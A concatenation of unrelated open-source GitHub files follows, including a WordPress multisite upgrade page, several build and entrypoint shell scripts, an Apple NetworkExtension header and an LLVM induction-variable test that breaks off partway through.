* the rights to use, copy, modify, merge, publish, distribute, sublicense,
* and/or sell copies of the Software, and to permit persons to whom the
* Software is furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice (including the next
* paragraph) shall be included in all copies or substantial portions of the
* Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
* THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
* FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
* IN THE SOFTWARE.
*
*/
#ifndef __MOCK_REQUEST__
#define __MOCK_REQUEST__
#include <linux/list.h>
#include "../i915_request.h"
struct i915_request *
mock_request(struct intel_context *ce, unsigned long delay);
bool mock_cancel_request(struct i915_request *request);
#endif /* !__MOCK_REQUEST__ */
| {
"pile_set_name": "Github"
} |
#include "libdis.h"
#include "ia32_settings.h"
#include "ia32_reg.h"
#include "ia32_insn.h"
ia32_settings_t ia32_settings = {
1, 0xF4,
MAX_INSTRUCTION_SIZE,
4, 4, 8, 4, 8,
REG_ESP_INDEX, REG_EBP_INDEX, REG_EIP_INDEX, REG_FLAGS_INDEX,
REG_DWORD_OFFSET, REG_SEG_OFFSET, REG_FPU_OFFSET,
opt_none
};
| {
"pile_set_name": "Github"
} |
<?php
/**
* Multisite upgrade administration panel.
*
* @package WordPress
* @subpackage Multisite
* @since 3.0.0
*/
/** Load WordPress Administration Bootstrap */
require_once __DIR__ . '/admin.php';
require_once ABSPATH . WPINC . '/http.php';
$title = __( 'Upgrade Network' );
$parent_file = 'upgrade.php';
get_current_screen()->add_help_tab(
array(
'id' => 'overview',
'title' => __( 'Overview' ),
'content' =>
'<p>' . __( 'Only use this screen once you have updated to a new version of WordPress through Updates/Available Updates (via the Network Administration navigation menu or the Toolbar). Clicking the Upgrade Network button will step through each site in the network, five at a time, and make sure any database updates are applied.' ) . '</p>' .
'<p>' . __( 'If a version update to core has not happened, clicking this button won’t affect anything.' ) . '</p>' .
'<p>' . __( 'If this process fails for any reason, users logging in to their sites will force the same update.' ) . '</p>',
)
);
get_current_screen()->set_help_sidebar(
'<p><strong>' . __( 'For more information:' ) . '</strong></p>' .
'<p>' . __( '<a href="https://wordpress.org/support/article/network-admin-updates-screen/">Documentation on Upgrade Network</a>' ) . '</p>' .
'<p>' . __( '<a href="https://wordpress.org/support/">Support</a>' ) . '</p>'
);
require_once ABSPATH . 'wp-admin/admin-header.php';
if ( ! current_user_can( 'upgrade_network' ) ) {
wp_die( __( 'Sorry, you are not allowed to access this page.' ), 403 );
}
echo '<div class="wrap">';
echo '<h1>' . __( 'Upgrade Network' ) . '</h1>';
$action = isset( $_GET['action'] ) ? $_GET['action'] : 'show';
switch ( $action ) {
case 'upgrade':
$n = ( isset( $_GET['n'] ) ) ? intval( $_GET['n'] ) : 0;
if ( $n < 5 ) {
/**
* @global int $wp_db_version WordPress database version.
*/
global $wp_db_version;
update_site_option( 'wpmu_upgrade_site', $wp_db_version );
}
$site_ids = get_sites(
array(
'spam' => 0,
'deleted' => 0,
'archived' => 0,
'network_id' => get_current_network_id(),
'number' => 5,
'offset' => $n,
'fields' => 'ids',
'order' => 'DESC',
'orderby' => 'id',
'update_site_meta_cache' => false,
)
);
if ( empty( $site_ids ) ) {
echo '<p>' . __( 'All done!' ) . '</p>';
break;
}
echo '<ul>';
foreach ( (array) $site_ids as $site_id ) {
switch_to_blog( $site_id );
$siteurl = site_url();
$upgrade_url = admin_url( 'upgrade.php?step=upgrade_db' );
restore_current_blog();
echo "<li>$siteurl</li>";
$response = wp_remote_get(
$upgrade_url,
array(
'timeout' => 120,
'httpversion' => '1.1',
'sslverify' => false,
)
);
if ( is_wp_error( $response ) ) {
wp_die(
sprintf(
/* translators: 1: Site URL, 2: Server error message. */
__( 'Warning! Problem updating %1$s. Your server may not be able to connect to sites running on it. Error message: %2$s' ),
$siteurl,
'<em>' . $response->get_error_message() . '</em>'
)
);
}
/**
* Fires after the Multisite DB upgrade for each site is complete.
*
* @since MU (3.0.0)
*
* @param array|WP_Error $response The upgrade response array or WP_Error on failure.
*/
do_action( 'after_mu_upgrade', $response );
/**
* Fires after each site has been upgraded.
*
* @since MU (3.0.0)
*
* @param int $site_id The Site ID.
*/
do_action( 'wpmu_upgrade_site', $site_id );
}
echo '</ul>';
?><p><?php _e( 'If your browser doesn’t start loading the next page automatically, click this link:' ); ?> <a class="button" href="upgrade.php?action=upgrade&n=<?php echo ( $n + 5 ); ?>"><?php _e( 'Next Sites' ); ?></a></p>
<script type="text/javascript">
<!--
function nextpage() {
location.href = "upgrade.php?action=upgrade&n=<?php echo ( $n + 5 ); ?>";
}
setTimeout( "nextpage()", 250 );
//-->
</script>
<?php
break;
case 'show':
default:
if ( (int) get_site_option( 'wpmu_upgrade_site' ) !== $GLOBALS['wp_db_version'] ) :
?>
<h2><?php _e( 'Database Update Required' ); ?></h2>
<p><?php _e( 'WordPress has been updated! Before we send you on your way, we need to individually upgrade the sites in your network.' ); ?></p>
<?php endif; ?>
<p><?php _e( 'The database update process may take a little while, so please be patient.' ); ?></p>
<p><a class="button button-primary" href="upgrade.php?action=upgrade"><?php _e( 'Upgrade Network' ); ?></a></p>
<?php
/**
* Fires before the footer on the network upgrade screen.
*
* @since MU (3.0.0)
*/
do_action( 'wpmu_upgrade_page' );
break;
}
?>
</div>
<?php require_once ABSPATH . 'wp-admin/admin-footer.php'; ?>
| {
"pile_set_name": "Github"
} |
{% if myFriends|default(null) %}
<div class="topic-num">
<div class="page-header">{{'thread.other_event.my_friends'|trans}}</div>
<div class="num-list">
{% include 'thread/event/user-grids-li.html.twig' with {members:myFriends} %}
</div>
</div>
{% endif %}
{% if members|default(null) %}
<div class="topic-num" id="event-member" data-sum="{{ membersCount|default(0) }}">
<div class="page-header">{{'thread.other_event.my_friends.newest_member'|trans({'%membersCount%':membersCount|default(0)})}}</div>
<div class="num-list js-join-members">
{% include 'thread/event/user-grids-li.html.twig' %}
</div>
<div class="num-more">
{% if membersCount|default(0) > 16 %}
{% do script(['app/js/thread/event-member/index.js']) %}
<span class="glyphicon glyphicon-chevron-down js-members-expand" style="cursor: pointer;" data-url="{{ path('ajax_thread_member_show', {threadId:threadId}) }}"></span>
<span class="glyphicon glyphicon-chevron-up js-members-collapse" style="cursor: pointer; display:none"></span>
{% endif %}
</div>
</div>
{% endif %}
| {
"pile_set_name": "Github"
} |
-- Show the complete text for page 11 in the book 'Legacy of the Aspects'
UPDATE `page_text` SET `NextPageID` = 466 WHERE `NextPageID` = 459 AND `ID` = 458;
| {
"pile_set_name": "Github"
} |
package com.alibaba.json.bvt.issue_2200.issue2224_5;
import com.alibaba.json.bvt.issue_2200.issue2224.KeyedCollection;
abstract class MA2GroupedCollection<TKey, TItem> extends KeyedCollection<TKey, TItem[]> {
}
| {
"pile_set_name": "Github"
} |
#!/bin/sh
set -e
# first arg is `-f` or `--some-option`
# or first arg is `something.toml`
if [ "${1#-}" != "$1" ] || [ "${1%.toml}" != "$1" ]; then
set -- /bin/ledis-server "$@"
fi
# allow the container to be started with `--user`
if [ "$1" = 'ledis-server' -a "$(id -u)" = '0' ]; then
chown -R ledis /datastore
chown ledis:ledis /bin/ledis-*
exec gosu ledis "$0" "$@"
fi
exec "$@" | {
"pile_set_name": "Github"
} |
var $path = require("path");
module.exports = {
mode: "production",
devtool: "source-map",
entry: {
index: ["core-js/stable", "./index.js"]
},
output: {
path: $path.join(__dirname, "dist"),
publicPath: "dist/",
filename: "[name].js",
chunkFilename: "[name].js"
},
module: {
rules: [{
            test: /\.js$/,
include: /node_modules/,
use: {
loader: "babel-loader",
options: {
presets: ["@babel/preset-env"],
plugins: ["@babel/plugin-syntax-dynamic-import"]
}
}
}, {
            test: /\.js$/,
use: ["source-map-loader"],
enforce: "pre"
}]
}
};
| {
"pile_set_name": "Github"
} |
// Copyright ©2017 The Gonum Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// Package ordered provides common sort ordering types.
package ordered // import "gonum.org/v1/gonum/graph/internal/ordered"
| {
"pile_set_name": "Github"
} |
#!/bin/bash
# Copyright 2017 Johns Hopkins University (Shinji Watanabe)
# Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
echo "$0 $*" >&2 # Print the command line for logging
. ./path.sh
nj=1
cmd=run.pl
nlsyms=""
lang=""
feat="" # feat.scp
oov="<unk>"
bpecode=""
allow_one_column=false
verbose=0
trans_type=char
filetype=""
preprocess_conf=""
category=""
out="" # If omitted, write in stdout
text=""
multilingual=false
help_message=$(cat << EOF
Usage: $0 <data-dir> <dict>
e.g. $0 data/train data/lang_1char/train_units.txt
Options:
--nj <nj> # number of parallel jobs
--cmd (utils/run.pl|utils/queue.pl <queue opts>) # how to run jobs.
--feat <feat-scp> # feat.scp or feat1.scp,feat2.scp,...
--oov <oov-word> # Default: <unk>
--out <outputfile> # If omitted, write in stdout
--filetype <mat|hdf5|sound.hdf5> # Specify the format of feats file
--preprocess-conf <json> # Apply preprocess to feats when creating shape.scp
--verbose <num> # Default: 0
EOF
)
. utils/parse_options.sh
if [ $# != 2 ]; then
echo "${help_message}" 1>&2
exit 1;
fi
set -euo pipefail
dir=$1
dic=$2
tmpdir=$(mktemp -d ${dir}/tmp-XXXXX)
trap 'rm -rf ${tmpdir}' EXIT
if [ -z ${text} ]; then
text=${dir}/text
fi
# 1. Create scp files for inputs
# These are not necessary in decoding mode, so they are made optional
input=
if [ -n "${feat}" ]; then
_feat_scps=$(echo "${feat}" | tr ',' ' ' )
read -r -a feat_scps <<< $_feat_scps
num_feats=${#feat_scps[@]}
for (( i=1; i<=num_feats; i++ )); do
feat=${feat_scps[$((i-1))]}
mkdir -p ${tmpdir}/input_${i}
input+="input_${i} "
cat ${feat} > ${tmpdir}/input_${i}/feat.scp
# Dump in the "legacy" style JSON format
if [ -n "${filetype}" ]; then
awk -v filetype=${filetype} '{print $1 " " filetype}' ${feat} \
> ${tmpdir}/input_${i}/filetype.scp
fi
feat_to_shape.sh --cmd "${cmd}" --nj ${nj} \
--filetype "${filetype}" \
--preprocess-conf "${preprocess_conf}" \
--verbose ${verbose} ${feat} ${tmpdir}/input_${i}/shape.scp
done
fi
# 2. Create scp files for outputs
mkdir -p ${tmpdir}/output
if [ -n "${bpecode}" ]; then
if [ ${multilingual} = true ]; then
# remove a space before the language ID
paste -d " " <(awk '{print $1}' ${text}) <(cut -f 2- -d" " ${text} \
| spm_encode --model=${bpecode} --output_format=piece | cut -f 2- -d" ") \
> ${tmpdir}/output/token.scp
else
paste -d " " <(awk '{print $1}' ${text}) <(cut -f 2- -d" " ${text} \
| spm_encode --model=${bpecode} --output_format=piece) \
> ${tmpdir}/output/token.scp
fi
elif [ -n "${nlsyms}" ]; then
text2token.py -s 1 -n 1 -l ${nlsyms} ${text} --trans_type ${trans_type} > ${tmpdir}/output/token.scp
else
text2token.py -s 1 -n 1 ${text} --trans_type ${trans_type} > ${tmpdir}/output/token.scp
fi
< ${tmpdir}/output/token.scp utils/sym2int.pl --map-oov ${oov} -f 2- ${dic} > ${tmpdir}/output/tokenid.scp
# +2 comes from CTC blank and EOS
vocsize=$(tail -n 1 ${dic} | awk '{print $2}')
odim=$(echo "$vocsize + 2" | bc)
< ${tmpdir}/output/tokenid.scp awk -v odim=${odim} '{print $1 " " NF-1 "," odim}' > ${tmpdir}/output/shape.scp
cat ${text} > ${tmpdir}/output/text.scp
# 3. Create scp files for the others
mkdir -p ${tmpdir}/other
if [ ${multilingual} == true ]; then
awk '{
n = split($1,S,"[-]");
lang=S[n];
print $1 " " lang
}' ${text} > ${tmpdir}/other/lang.scp
elif [ -n "${lang}" ]; then
awk -v lang=${lang} '{print $1 " " lang}' ${text} > ${tmpdir}/other/lang.scp
fi
if [ -n "${category}" ]; then
awk -v category=${category} '{print $1 " " category}' ${dir}/text \
> ${tmpdir}/other/category.scp
fi
cat ${dir}/utt2spk > ${tmpdir}/other/utt2spk.scp
# 4. Merge scp files into a JSON file
opts=""
if [ -n "${feat}" ]; then
intypes="${input} output other"
else
intypes="output other"
fi
for intype in ${intypes}; do
if [ -z "$(find "${tmpdir}/${intype}" -name "*.scp")" ]; then
continue
fi
if [ ${intype} != other ]; then
opts+="--${intype%_*}-scps "
else
opts+="--scps "
fi
for x in "${tmpdir}/${intype}"/*.scp; do
k=$(basename ${x} .scp)
if [ ${k} = shape ]; then
opts+="shape:${x}:shape "
else
opts+="${k}:${x} "
fi
done
done
if ${allow_one_column}; then
opts+="--allow-one-column true "
else
opts+="--allow-one-column false "
fi
if [ -n "${out}" ]; then
opts+="-O ${out}"
fi
merge_scp2json.py --verbose ${verbose} ${opts}
rm -fr ${tmpdir}
| {
"pile_set_name": "Github"
} |
{
"name": "JOHNSON WOOLEN MILLS",
"displayName": "JOHNSON WOOLEN MILLS",
"properties": [
"johnsonwoolenmills.com"
]
}
| {
"pile_set_name": "Github"
} |
#!/bin/bash -e
here=$(readlink -f $(dirname "$0"))
cd "${here}"
# clean up any remnants from the previous build
rm -rf pi-gen
docker rm -v pigen_work >/dev/null 2>&1 || true
compgen -G "gateway*" >/dev/null && rm -rf gateway* || true
compgen -G "node_modules*" >/dev/null && rm -rf node_modules* || true
# copy the gateway source
_temp=$(mktemp -d)
cp -a "${here}/.." "${_temp}"
# get a fresh copy of pi-gen
git clone https://github.com/RPi-Distro/pi-gen.git
# replace stage3 and add our config and the gateway source
rm -rf pi-gen/stage3
cp -r config stage3 pi-gen
mkdir pi-gen/stage3/03-add-gateway/files
mv "${_temp}" pi-gen/stage3/03-add-gateway/files/gateway
rm -rf pi-gen/stage3/03-add-gateway/files/gateway/{.git,image,node_modules}
cd pi-gen
# fix 32-/64-bit issue: https://github.com/RPi-Distro/pi-gen/issues/271
if sed --version 2>&1 | grep -q GNU; then
sed -i 's_FROM debian:buster_FROM i386/debian:buster_' Dockerfile
else
sed -i '' 's_FROM debian:buster_FROM i386/debian:buster_' Dockerfile
fi
# skip stage4 and stage5
touch ./stage4/SKIP ./stage5/SKIP
touch ./stage2/SKIP_IMAGES ./stage4/SKIP_IMAGES ./stage5/SKIP_IMAGES
# build it
PRESERVE_CONTAINER=1 ./build-docker.sh
cd "${here}"
# rename the image
_version="$(node -e "console.log(require('../package.json').version)")"
_image_name=$(basename $(ls -1 pi-gen/deploy/*.zip))
_image_name=${_image_name/image_/}
_image_name=${_image_name/.zip/}
mv pi-gen/deploy/*.zip "gateway-${_version}.img.zip"
shasum --algorithm 256 "gateway-${_version}.img.zip" > "gateway-${_version}.img.zip.sha256sum"
# copy the built gateway out of the docker image
docker cp "pigen_work:/pi-gen/work/${_image_name}/stage3/rootfs/home/pi/mozilla-iot/gateway" .
makeContentAddressedArchive() {
base_name="$1"
digest=$(openssl dgst -sha256 "${base_name}.tar.gz" | awk '{print $2}')
mv "${base_name}.tar.gz" "${base_name}-${digest}.tar.gz"
}
# generate the OTA release files
mv gateway/node_modules node_modules
tar czf gateway.tar.gz gateway
tar czf node_modules.tar.gz node_modules
makeContentAddressedArchive node_modules
makeContentAddressedArchive gateway
# clean up
rm -rf gateway node_modules pi-gen
docker rm -v pigen_work
| {
"pile_set_name": "Github"
} |
/*
* Copyright (c) 2015, 2017 Apple Inc.
* All rights reserved.
*/
#ifndef __NE_INDIRECT__
#error "Please import the NetworkExtension module instead of this file directly."
#endif
NS_ASSUME_NONNULL_BEGIN
/*!
* @file NEAppProxyFlow.h
* @discussion This file declares the NEAppProxyFlow API. The NEAppProxyFlow API is used to interact with various streams of network data in the context of NEProvider implementations.
*/
@class NWHostEndpoint;
@class NEFlowMetaData;
#if defined(__cplusplus)
#define NEAPPPROXYFLOW_EXPORT extern "C"
#else
#define NEAPPPROXYFLOW_EXPORT extern
#endif
/*!
* @typedef NEAppProxyFlowError
* @abstract Flow error codes
*/
typedef NS_ENUM(NSInteger, NEAppProxyFlowError) {
	/*! @const NEAppProxyFlowErrorNotConnected The flow is not fully open. */
NEAppProxyFlowErrorNotConnected = 1,
/*! @const NEAppProxyFlowErrorPeerReset The remote peer reset the flow. */
NEAppProxyFlowErrorPeerReset = 2,
/*! @const NEAppProxyFlowErrorHostUnreachable The remote peer is unreachable. */
NEAppProxyFlowErrorHostUnreachable = 3,
/*! @const NEAppProxyFlowErrorInvalidArgument An invalid argument was passed to one of the NEAppProxyFlow methods. */
NEAppProxyFlowErrorInvalidArgument = 4,
/*! @const NEAppProxyFlowErrorAborted The flow was aborted. */
NEAppProxyFlowErrorAborted = 5,
/*! @const NEAppProxyFlowErrorRefused The flow was disallowed. */
NEAppProxyFlowErrorRefused = 6,
/*! @const NEAppProxyFlowErrorTimedOut The flow timed out. */
NEAppProxyFlowErrorTimedOut = 7,
/*! @const NEAppProxyFlowErrorInternal An internal error occurred. */
NEAppProxyFlowErrorInternal = 8,
/*! @const NEAppProxyFlowErrorDatagramTooLarge An attempt was made to write a datagram that is larger than the socket's receive window */
NEAppProxyFlowErrorDatagramTooLarge NS_AVAILABLE(10_11, 9_3) = 9,
/*! @const NEAppProxyFlowErrorReadAlreadyPending A read operation on the flow is already pending */
NEAppProxyFlowErrorReadAlreadyPending NS_AVAILABLE(10_11, 9_3) = 10,
} NS_ENUM_AVAILABLE(10_11, 9_0);
/*! @const NEAppProxyErrorDomain The NEAppProxyFlow error domain */
NEAPPPROXYFLOW_EXPORT NSString * const NEAppProxyErrorDomain NS_AVAILABLE(10_11, 9_0);
/*!
* @interface NEAppProxyFlow
* @discussion The NEAppProxyFlow class is an abstract base class that declares the programmatic interface for a flow of network data.
*
* NEAppProxyFlow is part of NetworkExtension.framework.
*
* Instances of this class are thread safe.
*/
NS_CLASS_AVAILABLE(10_11, 9_0)
@interface NEAppProxyFlow : NSObject
/*!
* @method openWithLocalEndpoint:completionHandler:
* @discussion This function is used by an NEProvider implementation to indicate that it is ready to handle flow data.
 * @param localEndpoint The address and port that should be used as the local endpoint of the socket associated with this flow. If the source application already specified a local endpoint by binding the socket then this parameter is ignored.
 * @param completionHandler A block that is called when the process of opening the flow is complete. A nil value passed to this block indicates that the flow was opened successfully. A non-nil NSError value indicates that the flow failed to open successfully.
*/
- (void)openWithLocalEndpoint:(nullable NWHostEndpoint *)localEndpoint completionHandler:(void (^)(NSError *__nullable error))completionHandler NS_AVAILABLE(10_11, 9_0);
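/* Illustrative usage sketch (not part of the original header; shows the declaration above):
 *   [flow openWithLocalEndpoint:nil completionHandler:^(NSError *error) {
 *       if (error == nil) {
 *           // the flow is open; the provider can start exchanging data
 *       }
 *   }];
 */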
/*!
* @method closeReadWithError:
* @discussion This function is used by an NEProvider implementation to indicate that it does not want to receive any more data from the flow.
* @param error An error in NEAppProxyErrorDomain that should be passed to the flow's source application.
*/
- (void)closeReadWithError:(nullable NSError *)error NS_AVAILABLE(10_11, 9_0);
/*!
* @method closeWriteWithError:
 * @discussion This function is used by an NEProvider implementation to indicate that it does not have any more data to write to the flow.
* @param error An error in NEAppProxyErrorDomain that should be passed to the flow's source application.
*/
- (void)closeWriteWithError:(nullable NSError *)error NS_AVAILABLE(10_11, 9_0);
/*!
* @property metaData
* @discussion An NEFlowMetaData object containing meta data for the flow.
*/
@property (readonly) NEFlowMetaData *metaData NS_AVAILABLE(10_11, 9_0);
@end
NS_ASSUME_NONNULL_END
| {
"pile_set_name": "Github"
} |
; NOTE: Assertions have been autogenerated by utils/update_test_checks.py
; RUN: opt < %s -indvars -S | FileCheck %s
target datalayout = "e-m:e-i64:64-p:64:64:64-n8:16:32:64-S128"
; When widening IV and its users, trunc and zext/sext are not needed
; if the original 32-bit user is known to be non-negative, whether
; the IV is considered signed or unsigned.
define void @foo(i32* %A, i32* %B, i32* %C, i32 %N) {
; CHECK-LABEL: @foo(
; CHECK-NEXT: entry:
; CHECK-NEXT: [[CMP1:%.*]] = icmp slt i32 0, [[N:%.*]]
; CHECK-NEXT: br i1 [[CMP1]], label [[FOR_BODY_LR_PH:%.*]], label [[FOR_END:%.*]]
; CHECK: for.body.lr.ph:
; CHECK-NEXT: [[WIDE_TRIP_COUNT:%.*]] = zext i32 [[N]] to i64
; CHECK-NEXT: br label [[FOR_BODY:%.*]]
; CHECK: for.body:
; CHECK-NEXT: [[INDVARS_IV:%.*]] = phi i64 [ [[INDVARS_IV_NEXT:%.*]], [[FOR_INC:%.*]] ], [ 0, [[FOR_BODY_LR_PH]] ]
; CHECK-NEXT: [[ARRAYIDX:%.*]] = getelementptr inbounds i32, i32* [[B:%.*]], i64 [[INDVARS_IV]]
; CHECK-NEXT: [[TMP0:%.*]] = load i32, i32* [[ARRAYIDX]], align 4
; CHECK-NEXT: [[TMP1:%.*]] = add nuw nsw i64 [[INDVARS_IV]], 2
; CHECK-NEXT: [[ARRAYIDX2:%.*]] = getelementptr inbounds i32, i32* [[C:%.*]], i64 [[TMP1]]
; CHECK-NEXT: [[TMP2:%.*]] = load i32, i32* [[ARRAYIDX2]], align 4
; CHECK-NEXT: [[ADD3:%.*]] = add nsw i32 [[TMP0]], [[TMP2]]
; CHECK-NEXT: [[TMP3:%.*]] = trunc i64 [[TMP1]] to i32
; CHECK-NEXT: [[DIV0:%.*]] = udiv i32 5, [[TMP3]]
; CHECK-NEXT: [[ADD4:%.*]] = add nsw i32 [[ADD3]], [[DIV0]]
; CHECK-NEXT: [[ARRAYIDX5:%.*]] = getelementptr inbounds i32, i32* [[A:%.*]], i64 [[INDVARS_IV]]
; CHECK-NEXT: store i32 [[ADD4]], i32* [[ARRAYIDX5]], align 4
; CHECK-NEXT: br label [[FOR_INC]]
; CHECK: for.inc:
; CHECK-NEXT: [[INDVARS_IV_NEXT]] = add nuw nsw i64 [[INDVARS_IV]], 1
; CHECK-NEXT: [[EXITCOND:%.*]] = icmp ne i64 [[INDVARS_IV_NEXT]], [[WIDE_TRIP_COUNT]]
; CHECK-NEXT: br i1 [[EXITCOND]], label [[FOR_BODY]], label [[FOR_COND_FOR_END_CRIT_EDGE:%.*]]
; CHECK: for.cond.for.end_crit_edge:
; CHECK-NEXT: br label [[FOR_END]]
; CHECK: for.end:
; CHECK-NEXT: ret void
;
entry:
%cmp1 = icmp slt i32 0, %N
br i1 %cmp1, label %for.body.lr.ph, label %for.end
for.body.lr.ph: ; preds = %entry
br label %for.body
for.body: ; preds = %for.body.lr.ph, %for.inc
%i.02 = phi i32 [ 0, %for.body.lr.ph ], [ %inc, %for.inc ]
%idxprom = sext i32 %i.02 to i64
%arrayidx = getelementptr inbounds i32, i32* %B, i64 %idxprom
%0 = load i32, i32* %arrayidx, align 4
%add = add nsw i32 %i.02, 2
%idxprom1 = zext i32 %add to i64
%arrayidx2 = getelementptr inbounds i32, i32* %C, i64 %idxprom1
%1 = load i32, i32* %arrayidx2, align 4
%add3 = add nsw i32 %0, %1
%div0 = udiv i32 5, %add
%add4 = add nsw i32 %add3, %div0
%idxprom4 = zext i32 %i.02 to i64
%arrayidx5 = getelementptr inbounds i32, i32* %A, i64 %idxprom4
store i32 %add4, i32* %arrayidx5, align 4
br label %for.inc
for.inc: ; preds = %for.body
%inc = add nsw i32 %i.02, 1
%cmp = icmp slt i32 %inc, %N
br i1 %cmp, label %for.body, label %for.cond.for.end_crit_edge
for.cond.for.end_crit_edge: ; preds = %for.inc
br label %for.end
for.end: ; preds = %for.cond.for.end_crit_edge, %entry
ret void
}
define void @foo1(i32* %A, i32* %B, i32* %C, i32 %N) {
; CHECK-LABEL: @foo1(
; CHECK-NEXT: entry:
; CHECK-NEXT: [[CMP1:%.*]] = icmp slt i32 0, [[N:%.*]]
; CHECK-NEXT: br i1 [[CMP1]], label [[FOR_BODY_LR_PH:%.*]], label [[FOR_END:%.*]]
; CHECK: for.body.lr.ph:
; CHECK-NEXT: [[WIDE_TRIP_COUNT:%.*]] = zext i32 [[N]] to i64
; CHECK-NEXT: br label [[FOR_BODY:%.*]]
; CHECK: for.body:
; CHECK-NEXT: [[INDVARS_IV:%.*]] = phi i64 [ [[INDVARS_IV_NEXT:%.*]], [[FOR_INC:%.*]] ], [ 0, [[FOR_BODY_LR_PH]] ]
; CHECK-NEXT: [[ARRAYIDX:%.*]] = getelementptr inbounds i32, i32* [[B:%.*]], i64 [[INDVARS_IV]]
; CHECK-NEXT: [[TMP0:%.*]] = load i32, i32* [[ARRAYIDX]], align 4
; CHECK-NEXT: [[TMP1:%.*]] = add nuw nsw i64 [[INDVARS_IV]], 2
; CHECK-NEXT: [[ARRAYIDX2:%.*]] = getelementptr inbounds i32, i32* [[C:%.*]], i64 [[TMP1]]
; CHECK-NEXT: [[TMP2:%.*]] = load i32, i32* [[ARRAYIDX2]], align 4
; CHECK-NEXT: [[ADD3:%.*]] = add nsw i32 [[TMP0]], [[TMP2]]
; CHECK-NEXT: [[ARRAYIDX5:%.*]] = getelementptr inbounds i32, i32* [[A:%.*]], i64 [[INDVARS_IV]]
; CHECK-NEXT: store i32 [[ADD3]], i32* [[ARRAYIDX5]], align 4
; CHECK-NEXT: br label [[FOR_INC]]
; CHECK: for.inc:
; CHECK-NEXT: [[INDVARS_IV_NEXT]] = add nuw nsw i64 [[INDVARS_IV]], 1
; CHECK-NEXT: [[EXITCOND:%.*]] = icmp ne i64 [[INDVARS_IV_NEXT]], [[WIDE_TRIP_COUNT]]
; CHECK-NEXT: br i1 [[EXITCOND]], label [[FOR_BODY]], label [[FOR_COND_FOR_END_CRIT_EDGE:%.*]]
; CHECK: for.cond.for.end_crit_edge:
; CHECK-NEXT: br label [[FOR_END]]
; CHECK: for.end:
; CHECK-NEXT: ret void
;
entry:
%cmp1 = icmp slt i32 0, %N
br i1 %cmp1, label %for.body.lr.ph, label %for.end
for.body.lr.ph: ; preds = %entry
br label %for.body
for.body: ; preds = %for.body.lr.ph, %for.inc
%i.02 = phi i32 [ 0, %for.body.lr.ph ], [ %inc, %for.inc ]
%idxprom = zext i32 %i.02 to i64
%arrayidx = getelementptr inbounds i32, i32* %B, i64 %idxprom
%0 = load i32, i32* %arrayidx, align 4
%add = add nsw i32 %i.02, 2
%idxprom1 = sext i32 %add to i64
%arrayidx2 = getelementptr inbounds i32, i32* %C, i64 %idxprom1
%1 = load i32, i32* %arrayidx2, align 4
%add3 = add nsw i32 %0, %1
%idxprom4 = sext i32 %i.02 to i64
%arrayidx5 = getelementptr inbounds i32, i32* %A, i64 %idxprom4
store i32 %add3, i32* %arrayidx5, align 4
br label %for.inc
for.inc: ; preds = %for.body
%inc = add nsw i32 %i.02, 1
%cmp = icmp slt i32 %inc, %N
br i1 %cmp, label %for.body, label %for.cond.for.end_crit_edge
for.cond.for.end_crit_edge: ; preds = %for.inc
br label %for.end
for.end: ; preds = %for.cond.for.end_crit_edge, %entry
ret void
}
@a = common global [100 x i32] zeroinitializer, align 16
@b = common global [100 x i32] zeroinitializer, align 16
define i32 @foo2(i32 %M) {
; CHECK-LABEL: @foo2(
; CHECK-NEXT: entry:
; CHECK-NEXT: [[CMP1:%.*]] = icmp slt i32 0, [[M:%.*]]
; CHECK-NEXT: br i1 [[CMP1]], label [[FOR_BODY_LR_PH:%.*]], label [[FOR_END:%.*]]
; CHECK: for.body.lr.ph:
; CHECK-NEXT: [[TMP0:%.*]] = sext i32 [[M]] to i64
; CHECK-NEXT: [[WIDE_TRIP_COUNT:%.*]] = zext i32 [[M]] to i64
; CHECK-NEXT: br label [[FOR_BODY:%.*]]
; CHECK: for.body:
; CHECK-NEXT: [[INDVARS_IV:%.*]] = phi i64 [ [[INDVARS_IV_NEXT:%.*]], [[FOR_INC:%.*]] ], [ 0, [[FOR_BODY_LR_PH]] ]
; CHECK-NEXT: [[ARRAYIDX:%.*]] = getelementptr inbounds [100 x i32], [100 x i32]* @a, i64 0, i64 [[INDVARS_IV]]
; CHECK-NEXT: [[TMP1:%.*]] = load i32, i32* [[ARRAYIDX]], align 4
; CHECK-NEXT: [[ARRAYIDX2:%.*]] = getelementptr inbounds [100 x i32], [100 x i32]* @b, i64 0, i64 [[INDVARS_IV]]
; CHECK-NEXT: [[TMP2:%.*]] = load i32, i32* [[ARRAYIDX2]], align 4
; CHECK-NEXT: [[ADD:%.*]] = add nsw i32 [[TMP1]], [[TMP2]]
; CHECK-NEXT: [[TMP3:%.*]] = add nsw i64 [[INDVARS_IV]], [[TMP0]]
; CHECK-NEXT: [[ARRAYIDX5:%.*]] = getelementptr inbounds [100 x i32], [100 x i32]* @a, i64 0, i64 [[TMP3]]
; CHECK-NEXT: store i32 [[ADD]], i32* [[ARRAYIDX5]], align 4
; CHECK-NEXT: br label [[FOR_INC]]
; CHECK: for.inc:
; CHECK-NEXT: [[INDVARS_IV_NEXT]] = add nuw nsw i64 [[INDVARS_IV]], 1
; CHECK-NEXT: [[EXITCOND:%.*]] = icmp ne i64 [[INDVARS_IV_NEXT]], [[WIDE_TRIP_COUNT]]
; CHECK-NEXT: br i1 [[EXITCOND]], label [[FOR_BODY]], label [[FOR_COND_FOR_END_CRIT_EDGE:%.*]]
; CHECK: for.cond.for.end_crit_edge:
; CHECK-NEXT: br label [[FOR_END]]
; CHECK: for.end:
; CHECK-NEXT: [[CALL:%.*]] = call i32 @dummy(i32* getelementptr inbounds ([100 x i32], [100 x i32]* @a, i32 0, i32 0), i32* getelementptr inbounds ([100 x i32], [100 x i32]* @b, i32 0, i32 0))
; CHECK-NEXT: ret i32 0
;
entry:
%cmp1 = icmp slt i32 0, %M
